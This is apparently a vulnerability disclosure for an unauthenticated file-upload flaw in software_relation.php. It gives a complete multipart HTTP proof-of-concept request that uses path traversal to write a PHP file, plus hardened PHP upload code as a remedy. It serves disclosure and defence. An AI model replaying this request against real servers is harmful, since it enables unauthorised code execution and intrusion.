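/Inter/software_relation.php has no authentication check configured and can be accessed without authorization. At lines 55-65, the name of the file being moved is built by directly concatenating the photo_name variable, and the file extension is controllable; when the copy at line 61 succeeds, an arbitrary shell can be injected.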
# EXP
PoC

```http
POST /inter/software_relation.php HTTP/1.1
Host: 192.168.163.129:6868
Content-Length: 1758
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://192.168.163.129:6868
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxRP5VjBKdqBrCixM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.163.129:6868/softmanagement/distribute/updatamain.php?m1=5&m2=0&m3=4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="userSession"
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="mode_id"
1
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolFileName"
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolFileName"
./../default.png
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolDescri"
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="id"
0
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="version"
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="sofe_typeof"
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolName"
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="fileSize"
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="param"
a
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolImage"; filename="../../c.php"
Content-Type: image/png
<?php phpinfo(); ?>
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolImageType"
0
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolName"
a
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolDescri"
b
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="version"
c
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="param"
1
------WebKitFormBoundaryxRP5VjBKdqBrCixM--
```
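
A hardened form of the upload handling this report describes, as an added example (not the product's own code): it rejects unauthenticated requests, ignores the client-supplied filename and extension of the `toolImage` field, and stores the image under a server-generated name. `store_tool_image()`, `UPLOAD_DIR`, the 2 MiB limit and the `user_id` session key are assumptions.

```php
<?php
declare(strict_types=1);

// Assumed storage directory; keep it outside the web root or disable PHP execution in it.
const UPLOAD_DIR = '/var/lib/app/tool_images';

// MIME type detected from file content => extension the server assigns.
const ALLOWED_TYPES = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

/**
 * Validate one $_FILES entry and store it under a server-generated name.
 * Hypothetical helper. Returns the stored name; throws RuntimeException on rejection.
 */
function store_tool_image(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'] ?? '')) {
        throw new RuntimeException('upload failed');
    }
    if (filesize($file['tmp_name']) > 2 * 1024 * 1024) {   // assumed 2 MiB limit
        throw new RuntimeException('file too large');
    }
    // Decide the type from the content, never from the client-supplied filename
    // or Content-Type header (the PoC sets both freely).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!is_string($mime) || !isset(ALLOWED_TYPES[$mime])
        || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an allowed image');
    }
    // The stored name contains no client input, so "../" sequences and a ".php"
    // suffix in the submitted filename cannot influence the destination path.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    // move_uploaded_file() only accepts files PHP itself received via POST.
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Entry point: reject unauthenticated callers before touching the upload.
session_start();
if (empty($_SESSION['user_id'])) {                         // assumed session key
    http_response_code(401);
    exit;
}
try {
    echo store_tool_image($_FILES['toolImage'] ?? []);
} catch (RuntimeException $e) {
    http_response_code(400);
}
```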